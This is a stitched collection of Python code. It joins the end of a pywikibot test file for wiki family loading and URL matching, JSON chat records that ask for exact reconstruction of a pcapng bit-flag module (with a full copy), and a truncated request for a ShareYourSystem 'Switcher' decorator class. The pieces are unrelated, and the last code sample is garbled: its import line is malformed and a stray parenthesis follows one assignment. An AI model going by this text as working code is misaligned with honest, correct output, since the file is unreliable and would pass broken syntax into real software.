self.assertTrue(f.langs)
self.assertTrue(f.codes)
self.assertTrue(iter(f.codes))
self.assertIsInstance(next(iter(f.codes)), basestring)
self.assertTrue(f.domains)
self.assertTrue(iter(f.domains))
for domain in f.domains:
self.assertIsInstance(domain, basestring)
if domain != 'localhost':
self.assertIn('.', domain)
self.assertEqual(f.name, name)
self.assertIsInstance(f.languages_by_size, list)
self.assertGreaterEqual(set(f.langs), set(f.languages_by_size))
if len(f.langs) > 6 and f.name != 'wikimediachapter':
self.assertNotEqual(f.languages_by_size, [])
if isinstance(f, SingleSiteFamily):
self.assertIsNotNone(f.code)
self.assertIsNotNone(f.domain)
self.assertEqual(set(f.langs), set([f.code]))
self.assertEqual(set(f.codes), set([f.code]))
def test_family_load_invalid(self):
"""Test that an invalid family raised UnknownFamily exception."""
self.assertRaises(UnknownFamily, Family.load, 'unknown')
def test_eq_different_families_by_name(self):
"""Test that two Family with same name are equal."""
family_1 = Family()
family_2 = Family()
family_1.name = 'a'
family_2.name = 'a'
self.assertNotEqual(id(family_1), id(family_2))
self.assertEqual(family_1, family_2)
def test_eq_different_families_by_id(self):
"""Test that two Family with no name attribute are not equal."""
family_1 = Family()
family_2 = Family()
family_1.name = 'a'
del family_2.name
self.assertNotEqual(id(family_1), id(family_2))
self.assertNotEqual(family_1, family_2)
def test_eq_family_with_string_repr_same_family(self):
"""Test that Family and string with same name are equal."""
family = Family.load('wikipedia')
other = 'wikipedia'
self.assertEqual(family, other)
self.assertFalse(family != other)
def test_ne_family_with_string_repr_different_family(self):
"""Test that Family and string with different name are not equal."""
family = Family.load('wikipedia')
other = 'wikisource'
self.assertNotEqual(family, other)
self.assertFalse(family == other)
def test_eq_family_with_string_repr_not_existing_family(self):
"""Test that Family and string with different name are not equal."""
family = Family.load('wikipedia')
other = 'unknown'
self.assertRaises(UnknownFamily, family.__eq__, other)
def test_get_obsolete_wp(self):
"""Test three types of obsolete codes."""
family = Family.load('wikipedia')
self.assertIsInstance(family.obsolete, dict)
# redirected code (see site tests test_alias_code_site)
self.assertEqual(family.obsolete['dk'], 'da')
# closed/locked site (see site tests test_locked_site)
self.assertEqual(family.obsolete['mh'], None)
# offline site (see site tests test_removed_site)
self.assertEqual(family.obsolete['ru-sib'], None)
def test_get_obsolete_test(self):
"""Test WikimediaFamily default obsolete."""
family = Family.load('test')
self.assertIn('dk', family.obsolete)
self.assertIn('dk', family.interwiki_replacements)
self.assertEqual(family.obsolete, family.interwiki_replacements)
self.assertEqual(family.interwiki_removals, set())
def test_set_obsolete(self):
"""Test obsolete can be set."""
family = Family()
self.assertEqual(family.obsolete, {})
self.assertEqual(family.interwiki_replacements, {})
self.assertEqual(family.interwiki_removals, [])
family.obsolete = {'a': 'b', 'c': None}
self.assertEqual(family.obsolete, {'a': 'b', 'c': None})
self.assertEqual(family.interwiki_replacements, {'a': 'b'})
self.assertEqual(family.interwiki_removals, ['c'])
def test_obsolete_readonly(self):
"""Test obsolete result not updatable."""
family = Family.load('test')
self.assertRaises(TypeError, family.obsolete.update, {})
self.assertRaises(TypeError, family.obsolete.__setitem__, 'a', 'b')
def test_WikimediaFamily_obsolete_readonly(self):
"""Test WikimediaFamily obsolete is readonly."""
family = Family.load('test')
self.assertRaises(TypeError, family.__setattr__, 'obsolete',
{'a': 'b', 'c': None})
class TestFamilyUrlRegex(PatchingTestCase):
"""Test family URL regex."""
net = False
@PatchingTestCase.patched(pywikibot, 'Site')
def Site(self, code, fam, *args, **kwargs):
"""Own DrySite creator."""
self.assertEqual(args, tuple())
self.assertEqual(kwargs, {})
self.assertEqual(code, self.current_code)
self.assertEqual(fam, self.current_family)
site = DrySite(code, fam, None, None)
site._siteinfo._cache['general'] = ({'articlepath': self.article_path},
True)
return site
def setUp(self):
"""Setup default article path."""
super(TestFamilyUrlRegex, self).setUp()
self.article_path = '/wiki/$1'
def test_from_url_wikipedia_extra(self):
"""Test various URLs against wikipedia regex."""
self.current_code = 'vo'
self.current_family = 'wikipedia'
f = Family.load('wikipedia')
prefix = 'https://vo.wikipedia.org'
self.assertEqual(f.from_url(prefix + '/wiki/'), 'vo')
self.assertEqual(f.from_url(prefix + '/w/index.php'), 'vo')
self.assertEqual(f.from_url(prefix + '/w/index.php/'), 'vo')
self.assertEqual(f.from_url(prefix + '/w/index.php?title=$1'), 'vo')
self.assertEqual(f.from_url(prefix + '/wiki/$1'), 'vo')
self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')
self.assertEqual(f.from_url(prefix + '/w/index.php/$1'), 'vo')
self.assertEqual(f.from_url('//vo.wikipedia.org/wiki/$1'), 'vo')
# Text after $1 is not allowed
self.assertRaises(ValueError, f.from_url,
'//vo.wikipedia.org/wiki/$1/foo')
# the IWM may contain the wrong protocol, but it's only used to
# determine a site so using HTTP or HTTPS is not an issue
self.assertEqual(f.from_url('http://vo.wikipedia.org/wiki/$1'), 'vo')
# wrong protocol
self.assertIsNone(f.from_url('ftp://vo.wikipedia.org/wiki/$1'))
# wrong code
self.assertIsNone(f.from_url('https://foobar.wikipedia.org/wiki/$1'))
# wrong family
self.assertIsNone(f.from_url('https://vo.wikibooks.org/wiki/$1'))
self.assertIsNone(f.from_url('http://vo.wikibooks.org/wiki/$1'))
# invalid path
self.assertIsNone(f.from_url('https://vo.wikipedia.org/wik/$1'))
self.assertIsNone(f.from_url('https://vo.wikipedia.org/index.php/$1'))
def test_each_family(self):
"""Test each family builds a working regex."""
for family in pywikibot.config.family_files:
self.current_family = family
family = Family.load(family)
for code in family.codes:
self.current_code = code
url = ('%s://%s%s/$1' % (family.protocol(code),
family.hostname(code),
family.path(code)))
# Families can switch off if they want to be detected using URL
# this applies for test:test (there is test:wikipedia)
if family._ignore_from_url or code in family._ignore_from_url:
self.assertIsNone(family.from_url(url))
else:
self.assertEqual(family.from_url(url), code)
class TestOldFamilyMethod(DeprecationTestCase):
"""Test cases for old site.Family method."""
net = False
def test_old_site_family_function(self):
"""Test deprecated Family function with valid families."""
f = pywikibot.site.Family('species')
self.assertEqual(f.name, 'species')
f = pywikibot.site.Family('osm')
self.assertEqual(f.name, 'osm')
self.assertOneDeprecationParts('pywikibot.site.Family',
'pywikibot.family.Family.load', 2)
# @deprecated warning occurs within redirect_func's call
# invoking the method instead of this test module.
self._do_test_warning_filename = False
f = pywikibot.site.Family('i18n', fatal=False)
self.assertEqual(f.name, 'i18n')
self.assertDeprecationParts('pywikibot.site.Family',
'pywikibot.family.Family.load')
self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')
def test_old_site_family_function_invalid(self):
"""Test that an invalid family raised UnknownFamily exception."""
# As assertRaises calls the method, unittest is the module
# invoking the method instead of this test module.
self._do_test_warning_filename = False
self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown',
fatal=False)
self.assertRaises(UnknownFamily, pywikibot.site.Family, 'unknown')
self.assertDeprecationParts('pywikibot.site.Family',
'pywikibot.family.Family.load')
self.assertDeprecationParts('fatal argument of pywikibot.family.Family.load')
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
```
|
[
{
"content": "Reconstruct the code exactly:\n```python\n\"\"\"\nModule to wrap an integer in bitwise flag/field accessors.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\n\nfrom pcapng._compat import namedtuple\n\n\nclass FlagBase(object):\n \"\"\"\\\n Base class for flag types to be used in a Flags object.\n Handles the bitwise math so subclasses don't have to worry about it.\n \"\"\"\n\n __slots__ = [\n \"owner\",\n \"offset\",\n \"size\",\n \"extra\",\n \"mask\",\n ]\n\n def __init__(self, owner, offset, size, extra=None):\n if size < 1:\n raise TypeError(\"Flag must be at least 1 bit wide\")\n if size > owner._nbits:\n raise TypeError(\"Flag must fit into owner size\")\n self.owner = owner\n self.offset = offset\n self.size = size\n self.extra = extra\n self.mask = ((1 << self.size) - 1) << self.offset\n\n def get_bits(self):\n return (self.owner._value & self.mask) >> self.offset\n\n def set_bits(self, val):\n val &= (1 << self.size) - 1\n self.owner._value &= ~self.mask\n self.owner._value |= val << self.offset\n\n\nclass FlagBool(FlagBase):\n \"\"\"Object representing a single boolean flag\"\"\"\n\n def __init__(self, owner, offset, size, extra=None):\n if size != 1:\n raise TypeError(\n \"{cls} can only be 1 bit in size\".format(cls=self.__class__.__name__)\n )\n super(FlagBool, self).__init__(owner, offset, size)\n\n def get(self):\n return bool(self.get_bits())\n\n def set(self, val):\n self.set_bits(int(bool(val)))\n\n\nclass FlagUInt(FlagBase):\n \"\"\"\\\n Object representing an unsigned integer of the given size stored in\n a larger bitfield\n \"\"\"\n\n def get(self):\n return self.get_bits()\n\n def set(self, val):\n self.set_bits(val)\n\n\nclass FlagEnum(FlagBase):\n \"\"\"\\\n Object representing a range of values stored in part of a larger\n bitfield\n \"\"\"\n\n def __init__(self, owner, offset, size, extra=None):\n if not isinstance(extra, Iterable):\n raise TypeError(\n \"{cls} needs an iterable of values\".format(cls=self.__class__.__name__)\n )\n extra = list(extra)\n if len(extra) > 2 ** size:\n raise TypeError(\n \"{cls} iterable has too many values (got {got}, \"\n \"{size} bits only address {max})\".format(\n cls=self.__class__.__name__,\n got=len(extra),\n size=size,\n max=2 ** size,\n )\n )\n\n super(FlagEnum, self).__init__(owner, offset, size, extra)\n\n def get(self):\n val = self.get_bits()\n try:\n return self.extra[val]\n except IndexError:\n return \"[invalid value]\"\n\n def set(self, val):\n if val in self.extra:\n self.set_bits(self.extra.index(val))\n elif isinstance(val, int):\n self.set_bits(val)\n else:\n raise TypeError(\n \"Invalid value {val} for {cls}\".format(\n val=val, cls=self.__class__.__name__\n )\n )\n\n\n# Class representing a single flag schema for FlagWord.\n# 'nbits' defaults to 1, and 'extra' defaults to None.\nFlagField = namedtuple(\n \"FlagField\", (\"name\", \"ftype\", \"nbits\", \"extra\"), defaults=(1, None)\n)\n\n\nclass FlagWord(object):\n \"\"\"\\\n Class to wrap an integer in bitwise flag/field accessors.\n \"\"\"\n\n __slots__ = [\n \"_nbits\",\n \"_value\",\n \"_schema\",\n ]\n\n def __init__(self, schema, nbits=32, initial=0):\n \"\"\"\n :param schema:\n A list of FlagField objects representing the values to be packed\n into this object, in order from LSB to MSB of the underlying int\n\n :param nbits:\n An integer representing the total number of bits used for flags\n\n :param initial:\n The initial integer value of the flags field\n \"\"\"\n\n self._nbits = nbits\n self._value = initial\n self._schema = OrderedDict()\n\n tot_bits = sum([item.nbits for item in schema])\n if tot_bits > nbits:\n raise TypeError(\n \"Too many fields for {nbits}-bit field \"\n \"(schema defines {tot} bits)\".format(nbits=nbits, tot=tot_bits)\n )\n\n bitn = 0\n for item in schema:\n if not isinstance(item, FlagField):\n raise TypeError(\"Schema must be composed of FlagField objects\")\n if not issubclass(item.ftype, FlagBase):\n raise TypeError(\"Expected FlagBase, got {}\".format(item.ftype))\n self._schema[item.name] = item.ftype(self, bitn, item.nbits, item.extra)\n bitn += item.nbits\n\n def __int__(self):\n return self._value\n\n def __repr__(self):\n rv = \"<{0} (value={1})\".format(self.__class__.__name__, self._value)\n for k, v in self._schema.items():\n rv += \" {0}={1}\".format(k, v.get())\n return rv + \">\"\n\n def __getattr__(self, name):\n try:\n v = self._schema[name]\n except KeyError:\n raise AttributeError(name)\n return v.get()\n\n def __setattr__(self, name, val):\n try:\n return object.__setattr__(self, name, val)\n except AttributeError:\n pass\n try:\n v = self._schema[name]\n except KeyError:\n raise AttributeError(name)\n return v.set(val)\n```\nReturn the exact text.",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code exactly:\n<|memory_start|>```python\n\"\"\"\nModule to wrap an integer in bitwise flag/field accessors.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\n\nfrom pcapng._compat import namedtuple\n\n\nclass FlagBase(object):\n \"\"\"\\\n Base class for flag types to be used in a Flags object.\n Handles the bitwise math so subclasses don't have to worry about it.\n \"\"\"\n\n __slots__ = [\n \"owner\",\n \"offset\",\n \"size\",\n \"extra\",\n \"mask\",\n ]\n\n def __init__(self, owner, offset, size, extra=None):\n if size < 1:\n raise TypeError(\"Flag must be at least 1 bit wide\")\n if size > owner._nbits:\n raise TypeError(\"Flag must fit into owner size\")\n self.owner = owner\n self.offset = offset\n self.size = size\n self.extra = extra\n self.mask = ((1 << self.size) - 1) << self.offset\n\n def get_bits(self):\n return (self.owner._value & self.mask) >> self.offset\n\n def set_bits(self, val):\n val &= (1 << self.size) - 1\n self.owner._value &= ~self.mask\n self.owner._value |= val << self.offset\n\n\nclass FlagBool(FlagBase):\n \"\"\"Object representing a single boolean flag\"\"\"\n\n def __init__(self, owner, offset, size, extra=None):\n if size != 1:\n raise TypeError(\n \"{cls} can only be 1 bit in size\".format(cls=self.__class__.__name__)\n )\n super(FlagBool, self).__init__(owner, offset, size)\n\n def get(self):\n return bool(self.get_bits())\n\n def set(self, val):\n self.set_bits(int(bool(val)))\n\n\nclass FlagUInt(FlagBase):\n \"\"\"\\\n Object representing an unsigned integer of the given size stored in\n a larger bitfield\n \"\"\"\n\n def get(self):\n return self.get_bits()\n\n def set(self, val):\n self.set_bits(val)\n\n\nclass FlagEnum(FlagBase):\n \"\"\"\\\n Object representing a range of values stored in part of a larger\n bitfield\n \"\"\"\n\n def __init__(self, owner, offset, size, extra=None):\n if not isinstance(extra, Iterable):\n raise TypeError(\n \"{cls} needs an iterable of values\".format(cls=self.__class__.__name__)\n )\n extra = list(extra)\n if len(extra) > 2 ** size:\n raise TypeError(\n \"{cls} iterable has too many values (got {got}, \"\n \"{size} bits only address {max})\".format(\n cls=self.__class__.__name__,\n got=len(extra),\n size=size,\n max=2 ** size,\n )\n )\n\n super(FlagEnum, self).__init__(owner, offset, size, extra)\n\n def get(self):\n val = self.get_bits()\n try:\n return self.extra[val]\n except IndexError:\n return \"[invalid value]\"\n\n def set(self, val):\n if val in self.extra:\n self.set_bits(self.extra.index(val))\n elif isinstance(val, int):\n self.set_bits(val)\n else:\n raise TypeError(\n \"Invalid value {val} for {cls}\".format(\n val=val, cls=self.__class__.__name__\n )\n )\n\n\n# Class representing a single flag schema for FlagWord.\n# 'nbits' defaults to 1, and 'extra' defaults to None.\nFlagField = namedtuple(\n \"FlagField\", (\"name\", \"ftype\", \"nbits\", \"extra\"), defaults=(1, None)\n)\n\n\nclass FlagWord(object):\n \"\"\"\\\n Class to wrap an integer in bitwise flag/field accessors.\n \"\"\"\n\n __slots__ = [\n \"_nbits\",\n \"_value\",\n \"_schema\",\n ]\n\n def __init__(self, schema, nbits=32, initial=0):\n \"\"\"\n :param schema:\n A list of FlagField objects representing the values to be packed\n into this object, in order from LSB to MSB of the underlying int\n\n :param nbits:\n An integer representing the total number of bits used for flags\n\n :param initial:\n The initial integer value of the flags field\n \"\"\"\n\n self._nbits = nbits\n self._value = initial\n self._schema = OrderedDict()\n\n tot_bits = sum([item.nbits for item in schema])\n if tot_bits > nbits:\n raise TypeError(\n \"Too many fields for {nbits}-bit field \"\n \"(schema defines {tot} bits)\".format(nbits=nbits, tot=tot_bits)\n )\n\n bitn = 0\n for item in schema:\n if not isinstance(item, FlagField):\n raise TypeError(\"Schema must be composed of FlagField objects\")\n if not issubclass(item.ftype, FlagBase):\n raise TypeError(\"Expected FlagBase, got {}\".format(item.ftype))\n self._schema[item.name] = item.ftype(self, bitn, item.nbits, item.extra)\n bitn += item.nbits\n\n def __int__(self):\n return self._value\n\n def __repr__(self):\n rv = \"<{0} (value={1})\".format(self.__class__.__name__, self._value)\n for k, v in self._schema.items():\n rv += \" {0}={1}\".format(k, v.get())\n return rv + \">\"\n\n def __getattr__(self, name):\n try:\n v = self._schema[name]\n except KeyError:\n raise AttributeError(name)\n return v.get()\n\n def __setattr__(self, name, val):\n try:\n return object.__setattr__(self, name, val)\n except AttributeError:\n pass\n try:\n v = self._schema[name]\n except KeyError:\n raise AttributeError(name)\n return v.set(val)\n```<|memory_end|>\nReturn the exact text.",
"role": "user"
}
] |
```python
"""
Module to wrap an integer in bitwise flag/field accessors.
"""
from collections import OrderedDict
from collections.abc import Iterable
from pcapng._compat import namedtuple
class FlagBase(object):
"""\
Base class for flag types to be used in a Flags object.
Handles the bitwise math so subclasses don't have to worry about it.
"""
__slots__ = [
"owner",
"offset",
"size",
"extra",
"mask",
]
def __init__(self, owner, offset, size, extra=None):
if size < 1:
raise TypeError("Flag must be at least 1 bit wide")
if size > owner._nbits:
raise TypeError("Flag must fit into owner size")
self.owner = owner
self.offset = offset
self.size = size
self.extra = extra
self.mask = ((1 << self.size) - 1) << self.offset
def get_bits(self):
return (self.owner._value & self.mask) >> self.offset
def set_bits(self, val):
val &= (1 << self.size) - 1
self.owner._value &= ~self.mask
self.owner._value |= val << self.offset
class FlagBool(FlagBase):
"""Object representing a single boolean flag"""
def __init__(self, owner, offset, size, extra=None):
if size != 1:
raise TypeError(
"{cls} can only be 1 bit in size".format(cls=self.__class__.__name__)
)
super(FlagBool, self).__init__(owner, offset, size)
def get(self):
return bool(self.get_bits())
def set(self, val):
self.set_bits(int(bool(val)))
class FlagUInt(FlagBase):
"""\
Object representing an unsigned integer of the given size stored in
a larger bitfield
"""
def get(self):
return self.get_bits()
def set(self, val):
self.set_bits(val)
class FlagEnum(FlagBase):
"""\
Object representing a range of values stored in part of a larger
bitfield
"""
def __init__(self, owner, offset, size, extra=None):
if not isinstance(extra, Iterable):
raise TypeError(
"{cls} needs an iterable of values".format(cls=self.__class__.__name__)
)
extra = list(extra)
if len(extra) > 2 ** size:
raise TypeError(
"{cls} iterable has too many values (got {got}, "
"{size} bits only address {max})".format(
cls=self.__class__.__name__,
got=len(extra),
size=size,
max=2 ** size,
)
)
super(FlagEnum, self).__init__(owner, offset, size, extra)
def get(self):
val = self.get_bits()
try:
return self.extra[val]
except IndexError:
return "[invalid value]"
def set(self, val):
if val in self.extra:
self.set_bits(self.extra.index(val))
elif isinstance(val, int):
self.set_bits(val)
else:
raise TypeError(
"Invalid value {val} for {cls}".format(
val=val, cls=self.__class__.__name__
)
)
# Class representing a single flag schema for FlagWord.
# 'nbits' defaults to 1, and 'extra' defaults to None.
FlagField = namedtuple(
"FlagField", ("name", "ftype", "nbits", "extra"), defaults=(1, None)
)
class FlagWord(object):
"""\
Class to wrap an integer in bitwise flag/field accessors.
"""
__slots__ = [
"_nbits",
"_value",
"_schema",
]
def __init__(self, schema, nbits=32, initial=0):
"""
:param schema:
A list of FlagField objects representing the values to be packed
into this object, in order from LSB to MSB of the underlying int
:param nbits:
An integer representing the total number of bits used for flags
:param initial:
The initial integer value of the flags field
"""
self._nbits = nbits
self._value = initial
self._schema = OrderedDict()
tot_bits = sum([item.nbits for item in schema])
if tot_bits > nbits:
raise TypeError(
"Too many fields for {nbits}-bit field "
"(schema defines {tot} bits)".format(nbits=nbits, tot=tot_bits)
)
bitn = 0
for item in schema:
if not isinstance(item, FlagField):
raise TypeError("Schema must be composed of FlagField objects")
if not issubclass(item.ftype, FlagBase):
raise TypeError("Expected FlagBase, got {}".format(item.ftype))
self._schema[item.name] = item.ftype(self, bitn, item.nbits, item.extra)
bitn += item.nbits
def __int__(self):
return self._value
def __repr__(self):
rv = "<{0} (value={1})".format(self.__class__.__name__, self._value)
for k, v in self._schema.items():
rv += " {0}={1}".format(k, v.get())
return rv + ">"
def __getattr__(self, name):
try:
v = self._schema[name]
except KeyError:
raise AttributeError(name)
return v.get()
def __setattr__(self, name, val):
try:
return object.__setattr__(self, name, val)
except AttributeError:
pass
try:
v = self._schema[name]
except KeyError:
raise AttributeError(name)
return v.set(val)
```
|
[
{
"content": "Reconstruct the code file line-for-line, unmodified:\n```python\n#<ImportSpecificModules>\nimport operator\n,Doer,Representer\nfrom ShareYourSystem.Functers import Functer,Triggerer,Hooker\nBaseModuleStr=\"ShareYourSystem.Functers.Functer\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\")\n#</ImportSpecificModules>\n\n#<DefineLocals>\nSYS.setSubModule(globals())\n\nSwitchingBeforeStr='Before'\nSwitchingAfterStr='After'\nSwitchingBindStr='bind'\n#</DefineLocals>\n\n#<DefineClass>\n@DecorationClass()\nclass SwitcherClass(BaseClass):\n\n\tdef default_init(self,**_KwargVariablesDict):\n\t\t\n\t\t#<DefineSpecificDo>\n\t\tself.SwitchingFunction=None \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedFunction=None\t\t\t\t\t#<NotRepresented>\n\t\tself.SwitchedFunctionStr=\"\" \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedBoolSuffixStr=\"\" \t\t\t\t#<NotRepresented>\n\t\tself.SwitchedClassBoolKeyStr=\"\" \t\t\t#<NotRepresented>\t\n\t\tself.SwitchedInstanceBoolKeyStr=\"\" \t\t#<NotRepresented>\n\t\t#</DefineSpecificDo>\n\n\t\t#Call the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\tdef __call__(self,_Variable):\n\n\t\t#Switch\n\t\tself.switch(_Variable)\n\n\t\t#Link\n\t\tself.FunctedFunction=self.SwitchedFunction\n\n\t\t#Call the call of the parent class\n\t\treturn BaseClass.__call__(self,self.SwitchingFunction)\n\n\tdef switch(self,_Variable=None):\n\n\t\t#set the switching Function\n\t\tif self.SwitchingFunction==None:\n\t\t\tself.SwitchingFunction=_Variable\n\n\t\t#set the SwitchedFunctionStr this is the functing function..and we remove all the tagged Functer@ \n\t\tself.SwitchedFunctionStr=self.SwitchingFunction.__name__.split(Functer.FunctingDecorationStr)[-1]\n\n\t\t#debug\n\t\tself.debug(('self.',self,['SwitchedFunctionStr']))\n\n\t\t#Cut the pre attributing part if there is one\n\t\tif Functer.FunctingAttributeStr in self.SwitchedFunctionStr:\n\t\t\tself.SwitchedFunctionStr=self.SwitchedFunctionStr.split(Functer.FunctingAttributeStr)[-1]\n\t\t#self.SwitchedDoneFunctionStr=Doer.getDoneStrWithDoStr(self.SwitchedFunctionStr)\n\t\t#SwitchedBoolSuffixStr=self.SwitchedDoneFunctionStr[0].upper()+self.SwitchedDoneFunctionStr[1:]\n\n\t\tself.SwitchedBoolSuffixStr=self.SwitchedFunctionStr[0].upper()+self.SwitchedFunctionStr[1:]+'Bool'\n\t\tself.SwitchedInstanceBoolKeyStr='Switching'+self.SwitchedBoolSuffixStr\n\t\t\n\t\t#self.SwitchedInstanceBoolKeyStr='SwitchedInstance'+self.SwitchedBoolSuffixStr\n\t\tself.SwitchedClassBoolKeyStr='SwitchedClass'+self.SwitchedBoolSuffixStr\n\n\t\t#debug\n\t\tself.debug(('self.',self,['SwitchedInstanceBoolKeyStr','SwitchedClassBoolKeyStr']))\n\n\t\t#Definition the SwitchedFunction\n\t\tdef SwitchedFunction(*_LiargVariablesList,**_KwargVariablesDict):\n\n\t\t\t#Alias\n\t\t\tInstanceVariable=_LiargVariablesList[0]\n\n\t\t\t#Append for debbuging\n\t\t\t#if hasattr(InstanceVariable,'DebuggingNotFrameFunctionStrsList'):\n\t\t\t#\tif 'SwitchedFunction' not in InstanceVariable.DebuggingNotFrameFunctionStrsList:\n\t\t\t#\t\tInstanceVariable.DebuggingNotFrameFunctionStrsList.append('SwitchedFunction')\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t('self.',self,['SwitchedClassBoolKeyStr','SwitchedInstanceBoolKeyStr']),\n\t\t\t\t\t\t\tRepresenter.represent(InstanceVariable,**{'RepresentingAlineaIsBool':False})\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#set the SwitchedBool if it was not already\n\t\t\tif hasattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr)==False:\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('The InstanceVariable has not the SwitchedBoolSuffixStr..so set it to False')\n\t\t\t\t'''\n\n\t\t\t\t#set\n\t\t\t\tInstanceVariable.__setattr__(self.SwitchedInstanceBoolKeyStr,False)\n\n\t\t\telif getattr(InstanceVariable,self.SwitchedInstanceBoolKeyStr):\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug('The Instance has already done this method')\n\t\t\t\t'''\n\n\t\t\t\t#Return\n\t\t\t\treturn InstanceVariable\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tself.debug(('self.',self,['SwitchedBoolSuffixStr']))\n\t\t\t'''\n\n\t\t\t#At the level of the class set the new binding set function\n\t\t\tif hasattr(InstanceVariable.__class__,self.SwitchedClassBoolKeyStr)==False:\t\n\n\t\t\t\t#Definition the binding function that will call the init one\n\t\t\t\tdef bindBefore(*_TriggeringVariablesList,**_TriggeringVariablesDict):\n\n\t\t\t\t\t#Alias\n\t\t\t\t\tTriggeredInstanceVariable=_TriggeringVariablesList[0]\n\n\t\t\t\t\t#debug\n\t\t\t\t\t'''\n\t\t\t\t\tself.debug('Reinit with '+Representer.represent(\n\t\t\t\t\t\tTriggeredInstanceVariable.SettingKeyVariable,**{'RepresentingAlineaIsBool':False}\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\t'''\n\n\t\t\t\t\t#Definition the init method to trigger\n\t\t\t\t\tSwitchedInitMethod=Functer.getFunctingFunctionWithFuncFunction(\n\t\t\t\t\t\tTriggeredInstanceVariable.__class__.init\n\t\t\t\t\t)\n\n\t\t\t\t\t#debug\n\t\t\t\t\t'''\n\t\t\t\t\tself.debug(\n\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t'SwitchedInitMethod is '+str(SwitchedInitMethod),\n\t\t\t\t\t\t\t\t\t\"SwitchedInitMethod.func_globals['__file__'] is \"+SwitchedInitMethod.func_globals['__file__']\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t)\n\t\t\t\t\t'''\n\n\t\t\t\t\t#Call the init method (just at the level of this class definition) (so IMPORTANT this is init not __init__)\n\t\t\t\t\tSwitchedInitMethod(TriggeredInstanceVariable)\n\n\t\t\t\t#set the name\n\t\t\t\tTriggeredBeforeMethodStr='bindBeforeWith'+self.SwitchedBoolSuffixStr\n\t\t\t\tbindBefore.__name__=TriggeredBeforeMethodStr\n\n\t\t\t\t#debug\n\t\t\t\t'''\n\t\t\t\tself.debug(\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t(\"self.\",self,['SwitchedDoneFunctionStr','SwitchedBoolSuffixStr']),\n\t\t\t\t\t\t\t\t(\"TriggeredMethodStr is \"+TriggeredMethodStr)\n\t\t\t\t\t\t\t]\n\t\t\t\t\t\t)\n\t\t\t\t'''\n\n\t\t\t\t#Link the bindBefore function\n\t\t\t\tsetattr(\n\t\t\t\t\t\t\tInstanceVariable.__class__,\n\t\t\t\t\t\t\tTriggeredBeforeMethodStr,\n\t\t\t\t\t\t\tTriggerer.TriggererClass(**\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t'TriggeringConditionVariable':[\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'SettingKeyVariable',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,self.SwitchedInstanceBoolKeyStr)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.SwitchedInstanceBoolKeyStr,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t(operator.eq,True)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t('SettingValueVariable',(operator.eq,False))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t\t\t'TriggeringHookStr':\"Before\"\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t)(bindBefore)\n\t\t\t\t\t\t)\n\n\t\t\t\t#Call with a default instance this bind function to be installed\n\t\t\t\tgetattr(InstanceVariable.__class__(),TriggeredBeforeMethodStr)()\n\n\t\t\t\t'''\n\t\t\t\t#Definition the binding function that will set the switched bool to True\n\t\t\t\tdef bindAfter(*_TriggeringVariablesList,**_TriggeringVariablesDict):\n\n\t\t\t\t\t#Alias\n\t\t\t\t\tTriggeredInstanceVariable=_TriggeringVariablesList[0]\n\n\t\t\t\t\t#Say that it is ok\n\t\t\t\t\tsetattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,False)\n\t\t\t\t\tsetattr(TriggeredInstanceVariable,self.SwitchedInstanceBoolKeyStr,True)\n\t\t\t\t\t\n\t\t\t\t#set the name\n\t\t\t\tTriggeredAfterMethodStr='bindAfterWith'+self.SwitchedBoolSuffixStr\n\t\t\t\tbindAfter.__name__=TriggeredAfterMethodStr\n\n\t\t\t\t#Link the bindAfter 